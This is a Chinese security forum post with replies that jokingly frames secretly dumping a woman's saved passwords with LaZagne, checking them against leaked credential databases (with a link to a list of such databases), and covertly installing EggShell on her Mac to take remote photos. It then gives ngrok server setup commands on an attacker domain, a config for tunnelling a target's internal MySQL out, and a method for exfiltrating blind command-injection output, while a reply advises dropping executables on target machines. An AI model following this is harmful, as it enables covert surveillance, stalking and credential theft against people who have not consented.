用户
搜索
  • TA的每日心情
    开心
    2018-3-30 08:47
  • 签到天数: 98 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    27

    主题

    347

    帖子

    3345

    魔法币
    收听
    2
    粉丝
    48
    注册时间
    2016-12-19

    i春秋签约作者

    发表于 2018-3-1 21:49:40 1810670
    众所周知,学习网络安全时,我们会遇到各种各样技术和新鲜事物,我们要保持浓厚的兴趣,只有这样才能提升自己的技术(wěisuǒ)能力。

    1. 场景

    本来,只是想讲讲关于内网穿透的事情,但是又担心没啥吸引力,拉不到客人。所以思来想去,还是写点带福利的文章,顺便讲讲内网穿透,希望各位客官开心。

    曾经,你是否经历这样的一个场景,一个温馨的夜晚,一个可爱懵懂的妹子找你求助,想让你到她家修电脑。

    一般情况下,有三种可能:
    1. 你是一个计算机大牛,从进屋到修完电脑再到离开,全程五分钟,说拜拜,离开时留下一个潇洒的背影,还有妹子崇拜的目光。
    2. 你是一个能力普通的电脑爱好者,你可能会鼓捣一个多钟头,喝一杯水,妹子向你道一声辛苦,回去路上小心。
    3. 你是一个技术不太好的人,你可能.........第二天早晨才离开,满脸通红,带着害羞。

    第三种人是我们的向往,和技术相比,在妹子家睡一觉更重要。这虽然是个段子,但是从一个网络安全爱好者出发,你就不能只局限在以上这三种情况里,你要用技术的手段,保护妹子的安全。那么,我们可以做哪些事情呢?

    2. 福利

    我们可以使用The LaZagne Project工具,把妹子所有的网站、游戏账号密码下载下来,回去和社工库对比。也可以下载wifi密码,再和万能钥匙对比。然后告诉妹子哪些密码不安全,需要修改密码。

    The LaZagne Project


    LaZagne项目是一个开源应用程序,用于检索存储在本地计算机上的大量密码。 每个软件使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。 此工具的开发目的是找到这些最常用的软件的密码。
    github地址:https://github.com/AlessandroZ/LaZagne

    密码数据库共享


    下载工具:resilio sync
    地址:https://www.resilio.com
    还有个地址,不知道对大家有没有帮助:
    https://github.com/6donote4/debian-scripts/blob/2c563b646ade65eb53f93c083733464b4b8f5b03/guideKey/Keys/20161212%20%E8%BF%91%E5%87%A0%E5%B9%B4%E7%BD%91%E4%B8%8A%E6%B3%84%E9%9C%B2%E3%80%81%E6%B5%81%E4%BC%A0%E5%87%BA%E6%9D%A5%E7%9A%84%E5%90%84%E7%A7%8D%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%8C%E5%B7%B2%E6%94%B6%E9%9B%86%E6%9C%8970G%2B.1.txt

    当然,如果妹子的电脑是mac,我们也可以装个EggShell,一旦妹子电脑被别人偷了,我们可以随时触发EggShell远程操控、或者拍照。然后拿着照片告诉妹子,这人就是小偷。如果电脑没丢,请不要在深夜触发拍照功能。

    Eggshell
    EggShell是一个用Python编写的监视工具。它给我们提供了一个命令行会话,让我们可以直接和远程设备交互。EggShell为我们提供上传/下载文件,拍照,位置跟踪,shell命令执行,持久性,升级权限,密码检索等功能和便利。
    github地址:https://github.com/neoneggplant/EggShell/blob/master/modules/helper.py

    这个工具和metasploit的session原理类似,可以拍照:
    ngrok0.jpg

    这个工具,是有一次我闲逛github时候无意中发现的。经测试,这个工具的远程拍照功能比较隐秘且好用,我在测试中,发现部分mac机型版本会存在问题,无法找到hostname,并向作者提交了issues。去年2017年12月份的时候,作者更新了3.0版本,已修复相关问题。

    我的mac电脑自从装了这个工具,每次有女生找我借电脑,我都很乐意。


    3. 内网穿透

    上面提到的远程给妹子拍照,可能大家要问,妹子在家、妹子在学校、妹子在咖啡厅,都是不同的ip地址,ip在不断变换。甚至只是藏在某个ip下的内网而已,且没有对外的端口暴露。我们怎么保证连接到妹子电脑,并实施远程操控?

    再比如,有的时候我们个人宽带用户也想将自己的服务发布到公网IP上。比如说我们做了一个很漂亮的网站想发布到互联网上供大家参观,在没有公网IP的情况下该怎么实现呢?还有的时候我们在对企业做渗透测试的时候,发现企业某台公网服务器只对公网开放了常见的80端口,而我们提权时需要用到的3389等端口没有对公网开放,这个时候又该怎么办呢?

    解决这些问题,就需要用到内网穿透技术。

    ngrok1.png

    通俗的解释,由于目标电脑ip和端口隐藏或者不稳定,攻击者服务器并不会主动去寻找目标。而是攻击者提供一台稳定的、公网对外暴露的服务器,然后目标电脑主动来连接攻击者服务器,然后进行实时通讯。

    大概流程是这样的:

    ngrok2.png

    具体内网穿透实现原理,可以参考:
    https://zhuanlan.zhihu.com/p/30351943


    4. Ngrok

    ngrok是非常流行的反向代理服务,可以进行内网穿透,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。

    官网地址:https://ngrok.com/

    在官方网站上面可以注册一个账号自己使用,不需要自己搭建也行,但是缺点就是速度慢,还有经常会连不上,所以我们可以通过自己搭建来解决这些问题。自己搭建的话,可以前往github下载server和client。

    github地址:https://github.com/inconshreveable/ngrok

    在github上一共有超过12k的点赞量,可见其受众程度还是很流行的。

    具体安装,这里以centOS为例,攻击者接受服务器域名为hack.domain.com:


    [Bash shell] 纯文本查看 复制代码
    root [~] # yum install mercurial golang
    root [~] # git clone [url]https://github.com/inconshreveable/ngrok[/url]
    root [~] # cd ngrok
    # 安装证书
    root [~] # NGROK_DOMAIN="hack.domain.com"
    root [~] # openssl genrsa -out base.key 2048
    root [~] # openssl req -new -x509 -nodes -key base.key -days 10000 -subj "/CN=$NGROK_DOMAIN" -out base.pem
    root [~] # openssl genrsa -out server.key 2048
    root [~] # openssl req -new -key server.key -subj "/CN=$NGROK_DOMAIN" -out server.csr
    root [~] # openssl x509 -req -in server.csr -CA base.pem -CAkey base.key -CAcreateserial -days 10000 -out server.crt
    root [~] # cp base.pem assets/client/tls/ngrokroot.crt
    # 由于中国防火墙的问题,修改git源
    root [~] # vim src/ngrok/log/logger.go
    log "github.com/keepeye/log4go"
    root [~] # make server
    root [~] # make client


    安装完成后,会在bin目录下对应两个可执行文件,分别是ngrokd对应server,ngrok对应client。

    指定编译客户端环境变量,如何确认GOOS和GOARCH,可以通过go env来查看,对于mac、linux、windows等都有支持。

    启动服务器:


    [Bash shell] 纯文本查看 复制代码
    root [~] # ./bin/ngrokd -tlsKey=server.key -tlsCrt=server.crt -domain="hack.domain.com" -httpAddr=":80" -httpsAddr=":443"


    为了避免和本地的80、443web服务冲突,可以修改对应httpAddr和httpsAddr。另外,ngrokd还会监听4443端口,用来接受client的请求连接。

    假设目标服务器在内网中,且有mysql 3306服务运行。这时,我们只需要将client程序ngrok上传到对应的目标服务器,然后生成一个文件ngrok.cfg,并执行ngrok程序即可:


    [Bash shell] 纯文本查看 复制代码
    root [~] # vim ngrok.cfg
    server_addr: "hack.domain.com:4443"
    trust_host_root_certs: false
    root [~] # ./ngrok -config=./ngrok.cfg -subdomain=mysql 3306


    上面这句指令的意思就是向ngrokd服务器,注册一个mysql前缀的域名监听。这时,我们将域名mysql.hack.domain.com指向我们的服务器,然后访问我们的服务器,就相当于访问了目标用户的内网mysql。

    怎么样,很神奇吧!


    5. 命令注入和可视化

    对于什么是命令注入,可以参考我的另一篇帖子:

    命令注入和一个分享

    不过,在实际攻击中,其实更多的会遇到不带返回值的情况。这个时候,我们一般都是通过sleep来确认是否有漏洞,发现漏洞后,如何进行数据回显?

    ngrok提供了请求的可视化和重放功能,一般国外黑客,都是通过ngrok来进行可视化操作的。

    如图,这是我自己的ngrokd服务,可以看到path设置为ichunqiu:


    ngrok3.png


    当我们把数据内容改成命令注入的结果后,传递给server端,就能进行数据回显了:
    ngrok4.png



    具体案例,可以参考这篇外文:
    https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d



    写在最后,本文里面没有过多讲述所列举的这些软件如何具体使用,我觉得写太多篇幅这方面的内容,有种凑数的感觉。大家如果有兴趣,可以自行去官网查看,或者私信一起学相关方面的知识。

    评分

    参与人数 3魔法币 +13 收起 理由
    鸭子 + 5 支持夏至冰雪
    icqtest + 5 感谢你的分享,i春秋论坛有你更精彩!.
    端木卡芝麻 + 3

    查看全部评分

    本帖被以下淘专辑推荐:

    夕立 发表于 2018-3-2 17:16
    表哥,装lazagne遇到个问题,有个叫memorpy的模块网上找不到

    建议直接google查查吧,或者具体错误贴出来。还有,作者提供了可执行程序,实际应用中,是不会去目标机器安装的,而是直接放可执行程序上去,你懂得~
    使用道具 举报 回复
    晨星之曦 发表于 2018-3-1 23:14
    大佬,github上面那个密码数据库怎么下载啊

    resilio sync下载,github上显示的是下载地址,你查一下resilio sync怎么用就知道了。去年初,还不需要翻墙下载,现在需要翻墙下载了。
    使用道具 举报 回复
    465svdpsz4 发表于 2018-3-2 02:40
    大佬那个数据库怎么下载啊,不懂求教

    resilio sync下载,github上显示的是下载地址,你查一下resilio sync怎么用就知道了。去年初,还不需要翻墙下载,现在需要翻墙下载了。
    使用道具 举报 回复
    表哥,装lazagne遇到个问题,有个叫memorpy的模块网上找不到
    使用道具 举报 回复
    大佬,github上面那个密码数据库怎么下载啊
    使用道具 举报 回复
    发表于 2018-3-2 15:30:59
    感谢分享,内网渗透要学的东西还是挺多的
    使用道具 举报 回复
    大佬那个数据库怎么下载啊,不懂求教
    使用道具 举报 回复
    66666666666666666666666
    使用道具 举报 回复
    大师傅~求拜师了喂
    使用道具 举报 回复
    哇,厉害厉害
    使用道具 举报 回复
    发表于 2018-3-2 08:53:57
    支持支持!
    使用道具 举报 回复
    再来多点裤子,你说好不好
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2018-3-2 13:01:11
    学习了学习了
    使用道具 举报 回复
    相当溜啊
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册